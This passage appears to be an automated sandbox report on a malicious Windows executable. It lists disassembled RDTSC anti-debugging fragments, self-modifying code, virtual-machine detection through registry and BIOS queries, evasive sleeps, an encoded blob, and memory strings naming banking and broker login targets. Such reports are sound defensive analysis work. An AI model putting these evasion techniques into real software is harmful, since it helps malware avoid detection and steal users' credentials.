Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B40A6B second address: 4B40A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B40B04 second address: 4B40B5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6268DAF3CFh 0x00000009 and cx, B9BEh 0x0000000e jmp 00007F6268DAF3D9h 0x00000013 popfd 0x00000014 mov ax, DB07h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push 05EFBE75h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jmp 00007F6268DAF3D4h 0x00000028 mov ecx, 11B3F801h 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B40B5F second address: 4B40BC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 8E00h 0x00000007 mov si, di 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor dword ptr [esp], 7045225Dh 0x00000014 pushad 0x00000015 call 00007F626941E961h 0x0000001a pop ebx 0x0000001b popad 0x0000001c call 00007F62DA333941h 0x00000021 push 75A52B70h 0x00000026 push dword ptr fs:[00000000h] 0x0000002d mov eax, dword ptr [esp+10h] 0x00000031 mov dword ptr [esp+10h], ebp 0x00000035 lea ebp, dword ptr [esp+10h] 0x00000039 sub esp, eax 0x0000003b push ebx 0x0000003c push esi 0x0000003d push edi 0x0000003e mov eax, dword ptr [75AB4538h] 0x00000043 xor dword ptr [ebp-04h], eax 0x00000046 xor eax, ebp 0x00000048 push eax 0x00000049 mov dword ptr [ebp-18h], esp 0x0000004c push dword ptr [ebp-08h] 0x0000004f mov eax, dword ptr [ebp-04h] 0x00000052 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000059 mov dword ptr [ebp-08h], eax 0x0000005c lea eax, dword ptr [ebp-10h] 0x0000005f mov dword ptr fs:[00000000h], eax 0x00000065 ret 0x00000066 jmp 00007F626941E969h 0x0000006b sub esi, esi 0x0000006d jmp 00007F626941E967h 0x00000072 mov dword ptr [ebp-1Ch], esi 0x00000075 push eax 0x00000076 push edx 0x00000077 pushad 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B40BC6 second address: 4B40BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6268DAF3D1h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B40BDC second address: 4B40BE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B40BE2 second address: 4B40BE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B50914 second address: 4B50918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B50918 second address: 4B50935 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B50935 second address: 4B50962 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E961h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F626941E963h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B50962 second address: 4B50966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B50966 second address: 4B5096C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B5096C second address: 4B509C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, ECh 0x00000005 pushfd 0x00000006 jmp 00007F6268DAF3D7h 0x0000000b sbb cl, 0000001Eh 0x0000000e jmp 00007F6268DAF3D9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F6268DAF3CEh 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B509C0 second address: 4B509C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B509C4 second address: 4B509CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B509CA second address: 4B509CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B509CF second address: 4B509EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 jmp 00007F6268DAF3CAh 0x0000000d mov dword ptr [esp], esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B509EA second address: 4B50A07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E969h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B50A07 second address: 4B50A2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6268DAF3CDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B50A2E second address: 4B50A34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B50A34 second address: 4B50A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B50A38 second address: 4B50A7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007F626941E967h 0x00000013 sub ecx, 603AB1AEh 0x00000019 jmp 00007F626941E969h 0x0000001e popfd 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B50A7D second address: 4B50AF8 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 je 00007F62D9CACCF8h 0x0000000e jmp 00007F6268DAF3D3h 0x00000013 cmp dword ptr [75AB459Ch], 05h 0x0000001a pushad 0x0000001b jmp 00007F6268DAF3D4h 0x00000020 push eax 0x00000021 mov cx, dx 0x00000024 pop edi 0x00000025 popad 0x00000026 je 00007F62D9CC4D9Dh 0x0000002c jmp 00007F6268DAF3D8h 0x00000031 xchg eax, esi 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F6268DAF3D7h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4B50BBE second address: 4B50C8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F626941E95Fh 0x00000009 or ch, 0000006Eh 0x0000000c jmp 00007F626941E969h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F626941E960h 0x00000018 add esi, 64047AE8h 0x0000001e jmp 00007F626941E95Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 pop esi 0x00000028 pushad 0x00000029 pushad 0x0000002a mov esi, 170A6071h 0x0000002f pushfd 0x00000030 jmp 00007F626941E95Eh 0x00000035 sbb ecx, 31B78D48h 0x0000003b jmp 00007F626941E95Bh 0x00000040 popfd 0x00000041 popad 0x00000042 jmp 00007F626941E968h 0x00000047 popad 0x00000048 pop ebp 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c movsx ebx, cx 0x0000004f pushfd 0x00000050 jmp 00007F626941E966h 0x00000055 jmp 00007F626941E965h 0x0000005a popfd 0x0000005b popad 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F978A5 second address: 5F978C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 jmp 00007F6268DAF3CCh 0x0000000d jne 00007F6268DAF3C6h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F978C0 second address: 5F978DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E969h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F8FD66 second address: 5F8FD91 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6268DAF3C6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007F6268DAF3C8h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F6268DAF3D3h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F8FD91 second address: 5F8FDAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F626941E956h 0x00000010 jmp 00007F626941E95Eh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F8FDAF second address: 5F8FDB9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6268DAF3C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F971B8 second address: 5F971C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F9893A second address: 5E1FB1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jo 00007F6268DAF3C6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xor dword ptr [esp], 57BE1E1Bh 0x00000015 mov dword ptr [ebp+122D2C9Dh], ecx 0x0000001b push dword ptr [ebp+122D0BD9h] 0x00000021 movsx esi, dx 0x00000024 call dword ptr [ebp+122D1A63h] 0x0000002a pushad 0x0000002b add dword ptr [ebp+122D1B47h], ebx 0x00000031 xor eax, eax 0x00000033 mov dword ptr [ebp+122D1C6Bh], edx 0x00000039 mov edx, dword ptr [esp+28h] 0x0000003d jmp 00007F6268DAF3D3h 0x00000042 mov dword ptr [ebp+122D36CAh], eax 0x00000048 stc 0x00000049 stc 0x0000004a mov esi, 0000003Ch 0x0000004f jmp 00007F6268DAF3D2h 0x00000054 add esi, dword ptr [esp+24h] 0x00000058 add dword ptr [ebp+122D1AE6h], edx 0x0000005e lodsw 0x00000060 or dword ptr [ebp+122D1AE6h], eax 0x00000066 add eax, dword ptr [esp+24h] 0x0000006a jmp 00007F6268DAF3D7h 0x0000006f jmp 00007F6268DAF3D3h 0x00000074 mov ebx, dword ptr [esp+24h] 0x00000078 mov dword ptr [ebp+122D1B6Ah], eax 0x0000007e push eax 0x0000007f push ebx 0x00000080 push esi 0x00000081 push eax 0x00000082 push edx 0x00000083 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F98A60 second address: 5F98A8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626941E966h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F626941E960h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F98A8E second address: 5F98A98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F6268DAF3C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F98D25 second address: 5F98D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 add dword ptr [esp], 654335BFh 0x0000000d mov dword ptr [ebp+122D1AA3h], edx 0x00000013 mov dword ptr [ebp+122D1B1Eh], ecx 0x00000019 lea ebx, dword ptr [ebp+1244C894h] 0x0000001f js 00007F626941E957h 0x00000025 xchg eax, ebx 0x00000026 push edi 0x00000027 push eax 0x00000028 push edx 0x00000029 push edx 0x0000002a pop edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F98D51 second address: 5F98D55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FB97F4 second address: 5FB97FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FB97FA second address: 5FB980B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6268DAF3CAh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FB980B second address: 5FB9811 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F8C726 second address: 5F8C73B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6268DAF3D1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FB76DA second address: 5FB76DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FB79AC second address: 5FB79C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 jmp 00007F6268DAF3CBh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FB79C3 second address: 5FB79E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F626941E956h 0x00000009 jmp 00007F626941E965h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FB79E3 second address: 5FB7A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 js 00007F6268DAF3EDh 0x0000000d jmp 00007F6268DAF3D9h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FB7A0D second address: 5FB7A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FB7DF5 second address: 5FB7DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FB7DF9 second address: 5FB7E04 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FB7E04 second address: 5FB7E42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6268DAF3C6h 0x0000000a ja 00007F6268DAF3C6h 0x00000010 jmp 00007F6268DAF3CCh 0x00000015 popad 0x00000016 jmp 00007F6268DAF3CFh 0x0000001b js 00007F6268DAF3C8h 0x00000021 push eax 0x00000022 push edx 0x00000023 jp 00007F6268DAF3C6h 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FB7F99 second address: 5FB7FAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F626941E956h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jl 00007F626941E956h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: ACBA30 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: CE8D5C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 5E1FB6E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 5E1FAB3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 5FC23E0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 5E1D646 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 5FD1D2E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 6051FFF instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 7696 Thread sleep time: -34017s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7880 Thread sleep time: -270000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7716 Thread sleep time: -30015s >= -30000s Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: file.exe, 00000002.00000002.1633438617.0000000000C3D000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000002.00000002.1635972942.0000000005FA1000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBn
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696492231s
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696492231
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: file.exe, 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1632829541.0000000000748000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: file.exe, 00000002.00000003.1382825840.00000000007FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 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
